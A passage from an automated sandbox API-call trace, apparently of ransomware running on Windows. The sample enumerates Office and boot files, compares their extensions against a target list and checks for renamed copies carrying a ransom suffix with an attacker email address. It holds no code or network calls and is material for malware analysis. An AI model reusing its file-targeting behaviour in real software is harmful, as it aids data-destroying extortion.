Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0274.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0274.946] lstrlenW (lpString=".doc") returned 4 [0274.946] lstrcmpiW (lpString1=".doc", lpString2=".MMW") returned -1 [0274.946] lstrlenW (lpString=".docx") returned 5 [0274.946] lstrcmpiW (lpString1=".docx", lpString2="0.MMW") returned -1 [0274.946] lstrlenW (lpString=".pdf") returned 4 [0274.946] lstrcmpiW (lpString1=".pdf", lpString2=".MMW") returned 1 [0274.946] lstrlenW (lpString=".xls") returned 4 [0274.946] lstrcmpiW (lpString1=".xls", lpString2=".MMW") returned 1 [0274.946] lstrlenW (lpString=".xlsx") returned 5 [0274.946] lstrcmpiW (lpString1=".xlsx", lpString2="0.MMW") returned -1 [0274.946] lstrlenW (lpString=".ppt") returned 4 [0274.946] lstrcmpiW (lpString1=".ppt", lpString2=".MMW") returned 1 [0274.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0274.946] lstrlenW (lpString=".zip") returned 4 [0274.946] lstrcmpiW (lpString1=".zip", lpString2=".MMW") returned 1 [0274.946] lstrlenW (lpString=".rar") returned 4 [0274.946] lstrcmpiW (lpString1=".rar", lpString2=".MMW") returned 1 [0274.946] lstrlenW (lpString=".bz2") returned 4 [0274.946] lstrcmpiW (lpString1=".bz2", lpString2=".MMW") returned -1 [0274.946] lstrlenW (lpString=".7z") returned 3 [0274.946] lstrcmpiW (lpString1=".7z", lpString2="MMW") returned -1 [0274.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0274.946] lstrlenW (lpString=".dbf") returned 4 [0274.946] lstrcmpiW (lpString1=".dbf", lpString2=".MMW") returned -1 [0274.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0274.946] lstrlenW (lpString=".1cd") returned 4 [0274.946] lstrcmpiW (lpString1=".1cd", lpString2=".MMW") returned -1 [0274.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0274.946] lstrlenW (lpString=".jpg") returned 4 [0274.946] lstrcmpiW (lpString1=".jpg", lpString2=".MMW") returned -1 [0274.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0274.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0274.946] lstrlenW (lpString=".doc") returned 4 [0274.946] lstrcmpiW (lpString1=".doc", lpString2=".MMW") returned -1 [0274.947] lstrlenW (lpString=".docx") returned 5 [0274.947] lstrcmpiW (lpString1=".docx", lpString2="0.MMW") returned -1 [0274.947] lstrlenW (lpString=".pdf") returned 4 [0274.947] lstrcmpiW (lpString1=".pdf", lpString2=".MMW") returned 1 [0274.947] lstrlenW (lpString=".xls") returned 4 [0274.947] lstrcmpiW (lpString1=".xls", lpString2=".MMW") returned 1 [0274.947] lstrlenW (lpString=".xlsx") returned 5 [0274.947] lstrcmpiW (lpString1=".xlsx", lpString2="0.MMW") returned -1 [0274.947] lstrlenW (lpString=".ppt") returned 4 [0274.947] lstrcmpiW (lpString1=".ppt", lpString2=".MMW") returned 1 [0274.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0274.947] lstrlenW (lpString=".zip") returned 4 [0274.947] lstrcmpiW (lpString1=".zip", lpString2=".MMW") returned 1 [0274.947] lstrlenW (lpString=".rar") returned 4 [0274.947] lstrcmpiW (lpString1=".rar", lpString2=".MMW") returned 1 [0274.947] lstrlenW (lpString=".bz2") returned 4 [0274.947] lstrcmpiW (lpString1=".bz2", lpString2=".MMW") returned -1 [0274.947] lstrlenW (lpString=".7z") returned 3 [0274.947] lstrcmpiW (lpString1=".7z", lpString2="MMW") returned -1 [0274.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0274.947] lstrlenW (lpString=".dbf") returned 4 [0274.947] lstrcmpiW (lpString1=".dbf", lpString2=".MMW") returned -1 [0274.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0274.947] lstrlenW (lpString=".1cd") returned 4 [0274.947] lstrcmpiW (lpString1=".1cd", lpString2=".MMW") returned -1 [0274.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0274.947] lstrlenW (lpString=".jpg") returned 4 [0274.947] lstrcmpiW (lpString1=".jpg", lpString2=".MMW") returned -1 [0274.947] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0274.947] lstrlenW (lpString="ACCDDSUI.DLL") returned 12 [0274.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0274.948] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=21424) returned 1 [0274.948] CloseHandle (hObject=0x3a8) returned 1 [0274.948] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll")) returned 0x20 [0274.948] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0274.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0274.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0274.948] lstrlenW (lpString=".doc") returned 4 [0274.948] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.948] lstrlenW (lpString=".docx") returned 5 [0274.948] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0274.948] lstrlenW (lpString=".pdf") returned 4 [0274.948] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.949] lstrlenW (lpString=".xls") returned 4 [0274.949] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0275.085] lstrlenW (lpString=".xlsx") returned 5 [0275.085] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0275.085] lstrlenW (lpString=".ppt") returned 4 [0275.085] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0275.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0275.085] lstrlenW (lpString=".zip") returned 4 [0275.085] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0275.085] lstrlenW (lpString=".rar") returned 4 [0275.085] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0275.085] lstrlenW (lpString=".bz2") returned 4 [0275.085] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0275.085] lstrlenW (lpString=".7z") returned 3 [0275.085] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0275.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0275.085] lstrlenW (lpString=".dbf") returned 4 [0275.085] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0275.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0275.086] lstrlenW (lpString=".1cd") returned 4 [0275.086] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0275.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0275.086] lstrlenW (lpString=".jpg") returned 4 [0275.086] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0275.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0275.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0275.086] lstrlenW (lpString=".doc") returned 4 [0275.086] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0275.086] lstrlenW (lpString=".docx") returned 5 [0275.086] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0275.086] lstrlenW (lpString=".pdf") returned 4 [0275.086] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0275.086] lstrlenW (lpString=".xls") returned 4 [0275.086] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0275.086] lstrlenW (lpString=".xlsx") returned 5 [0275.086] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0275.086] lstrlenW (lpString=".ppt") returned 4 [0275.086] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0275.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0275.086] lstrlenW (lpString=".zip") returned 4 [0275.086] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0275.086] lstrlenW (lpString=".rar") returned 4 [0275.086] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0275.086] lstrlenW (lpString=".bz2") returned 4 [0275.086] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0275.086] lstrlenW (lpString=".7z") returned 3 [0275.086] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0275.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0275.086] lstrlenW (lpString=".dbf") returned 4 [0275.086] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0275.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0275.086] lstrlenW (lpString=".1cd") returned 4 [0275.086] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0275.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0275.086] lstrlenW (lpString=".jpg") returned 4 [0275.087] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0275.087] lstrcmpiW (lpString1=".VSL", lpString2=".0day") returned 1 [0275.087] lstrlenW (lpString="AECUTILS.VSL") returned 12 [0275.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aecutils.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 66 os_tid = 0x6a8 [0265.461] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10000) returned 0x4220060 [0265.461] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10000) returned 0x4230068 [0265.461] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x51a3d8 [0265.461] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6) returned 0x521c70 [0265.461] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x51a3f0 [0265.461] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x100000) returned 0x43f0020 [0265.461] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x51a408 [0265.461] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x51a408, Size=0x20) returned 0x35951d0 [0265.462] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x51a408 [0265.462] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x51a408, Size=0x20) returned 0x35951f8 [0265.462] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0265.462] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0265.462] Wow64DisableWow64FsRedirection (in: OldValue=0x3b9ff58 | out: OldValue=0x3b9ff58*=0x0) returned 1 [0265.462] lstrlenW (lpString="kernel32.dll") returned 12 [0265.462] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x35951d0 | out: hHeap=0x4a0000) returned 1 [0265.462] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0265.462] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x35951f8 | out: hHeap=0x4a0000) returned 1 [0265.462] lstrlenW (lpString="BCD") returned 3 [0265.462] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.462] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0265.462] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0265.462] lstrlenW (lpString=".doc") returned 4 [0265.462] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0265.462] lstrlenW (lpString=".docx") returned 5 [0265.462] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0265.463] lstrlenW (lpString=".pdf") returned 4 [0265.463] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0265.463] lstrlenW (lpString=".xls") returned 4 [0265.463] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0265.463] lstrlenW (lpString=".xlsx") returned 5 [0265.463] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0265.463] lstrlenW (lpString=".ppt") returned 4 [0265.463] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0265.463] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0265.463] lstrlenW (lpString=".zip") returned 4 [0265.463] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0265.463] lstrlenW (lpString=".rar") returned 4 [0265.463] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0265.463] lstrlenW (lpString=".bz2") returned 4 [0265.463] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0265.463] lstrlenW (lpString=".7z") returned 3 [0265.463] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0265.463] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0265.463] lstrlenW (lpString=".dbf") returned 4 [0265.463] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0265.463] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0265.463] lstrlenW (lpString=".1cd") returned 4 [0265.463] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0265.463] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0265.463] lstrlenW (lpString=".jpg") returned 4 [0265.463] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0265.463] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0265.463] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0265.463] lstrlenW (lpString=".doc") returned 4 [0265.463] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0265.463] lstrlenW (lpString=".docx") returned 5 [0265.463] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0265.463] lstrlenW (lpString=".pdf") returned 4 [0265.464] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0265.464] lstrlenW (lpString=".xls") returned 4 [0265.464] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0265.464] lstrlenW (lpString=".xlsx") returned 5 [0265.464] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0265.464] lstrlenW (lpString=".ppt") returned 4 [0265.464] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0265.464] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0265.464] lstrlenW (lpString=".zip") returned 4 [0265.464] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0265.464] lstrlenW (lpString=".rar") returned 4 [0265.464] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0265.464] lstrlenW (lpString=".bz2") returned 4 [0265.464] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0265.464] lstrlenW (lpString=".7z") returned 3 [0265.464] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0265.464] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0265.464] lstrlenW (lpString=".dbf") returned 4 [0265.464] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0265.464] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0265.464] lstrlenW (lpString=".1cd") returned 4 [0265.464] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0265.464] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0265.464] lstrlenW (lpString=".jpg") returned 4 [0265.464] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0265.464] lstrcmpiW (lpString1=".LOG1", lpString2=".0day") returned 1 [0265.464] lstrlenW (lpString="BCD.LOG1") returned 8 [0265.464] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0265.465] GetFileSizeEx (in: hFile=0x240, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=0) returned 1 [0265.465] CloseHandle (hObject=0x240) returned 1 [0265.465] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0265.465] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0265.465] lstrlenW (lpString=".doc") returned 4 [0265.465] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0265.465] lstrlenW (lpString=".docx") returned 5 [0265.465] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0265.465] lstrlenW (lpString=".pdf") returned 4 [0265.465] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0265.465] lstrlenW (lpString=".xls") returned 4 [0265.465] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0265.465] lstrlenW (lpString=".xlsx") returned 5 [0265.465] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0265.465] lstrlenW (lpString=".ppt") returned 4 [0265.465] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0265.465] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0265.465] lstrlenW (lpString=".zip") returned 4 [0265.465] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0265.465] lstrlenW (lpString=".rar") returned 4 [0265.465] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0265.465] lstrlenW (lpString=".bz2") returned 4 [0265.465] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0265.465] lstrlenW (lpString=".7z") returned 3 [0265.465] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0265.465] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0265.465] lstrlenW (lpString=".dbf") returned 4 [0265.465] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0265.465] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0265.465] lstrlenW (lpString=".1cd") returned 4 [0265.465] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0265.466] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0265.466] lstrlenW (lpString=".jpg") returned 4 [0265.466] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0265.466] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0265.466] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0265.466] lstrlenW (lpString=".doc") returned 4 [0265.466] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0265.466] lstrlenW (lpString=".docx") returned 5 [0265.466] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0265.466] lstrlenW (lpString=".pdf") returned 4 [0265.466] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0265.466] lstrlenW (lpString=".xls") returned 4 [0265.466] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0265.466] lstrlenW (lpString=".xlsx") returned 5 [0265.466] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0265.466] lstrlenW (lpString=".ppt") returned 4 [0265.466] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0265.466] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0265.466] lstrlenW (lpString=".zip") returned 4 [0265.466] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0265.466] lstrlenW (lpString=".rar") returned 4 [0265.466] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0265.466] lstrlenW (lpString=".bz2") returned 4 [0265.466] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0265.466] lstrlenW (lpString=".7z") returned 3 [0265.466] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0265.466] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0265.466] lstrlenW (lpString=".dbf") returned 4 [0265.466] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0265.466] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0265.466] lstrlenW (lpString=".1cd") returned 4 [0265.466] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0265.466] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0265.466] lstrlenW (lpString=".jpg") returned 4 [0265.466] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0265.467] lstrcmpiW (lpString1=".LOG2", lpString2=".0day") returned 1 [0265.467] lstrlenW (lpString="BCD.LOG2") returned 8 [0265.467] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0265.467] GetFileSizeEx (in: hFile=0x240, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=0) returned 1 [0265.467] CloseHandle (hObject=0x240) returned 1 [0265.467] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0265.467] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0265.467] lstrlenW (lpString=".doc") returned 4 [0265.467] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0265.467] lstrlenW (lpString=".docx") returned 5 [0265.467] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0265.467] lstrlenW (lpString=".pdf") returned 4 [0265.467] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0265.467] lstrlenW (lpString=".xls") returned 4 [0265.467] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0265.467] lstrlenW (lpString=".xlsx") returned 5 [0265.467] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0265.467] lstrlenW (lpString=".ppt") returned 4 [0265.467] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0265.467] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0265.467] lstrlenW (lpString=".zip") returned 4 [0265.467] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0265.467] lstrlenW (lpString=".rar") returned 4 [0265.467] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0265.467] lstrlenW (lpString=".bz2") returned 4 [0265.468] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0265.468] lstrlenW (lpString=".7z") returned 3 [0265.468] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0265.468] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0265.468] lstrlenW (lpString=".dbf") returned 4 [0265.468] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0265.468] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0265.468] lstrlenW (lpString=".1cd") returned 4 [0265.468] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0265.468] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0265.468] lstrlenW (lpString=".jpg") returned 4 [0265.468] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0265.468] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0265.468] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0265.468] lstrlenW (lpString=".doc") returned 4 [0265.468] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0265.468] lstrlenW (lpString=".docx") returned 5 [0265.468] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0265.468] lstrlenW (lpString=".pdf") returned 4 [0265.468] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0265.468] lstrlenW (lpString=".xls") returned 4 [0265.468] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0265.468] lstrlenW (lpString=".xlsx") returned 5 [0265.468] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0265.468] lstrlenW (lpString=".ppt") returned 4 [0265.468] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0265.468] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0265.468] lstrlenW (lpString=".zip") returned 4 [0265.468] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0265.468] lstrlenW (lpString=".rar") returned 4 [0265.468] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0265.469] lstrlenW (lpString=".bz2") returned 4 [0265.469] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0265.469] lstrlenW (lpString=".7z") returned 3 [0265.469] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0265.469] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0265.469] lstrlenW (lpString=".dbf") returned 4 [0265.469] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0265.469] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0265.469] lstrlenW (lpString=".1cd") returned 4 [0265.469] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0265.469] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0265.469] lstrlenW (lpString=".jpg") returned 4 [0265.469] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0265.469] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0265.469] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0265.469] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0265.469] GetFileSizeEx (in: hFile=0x240, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=89168) returned 1 [0265.469] CloseHandle (hObject=0x240) returned 1 [0265.470] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0265.470] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0265.470] CreateFileW 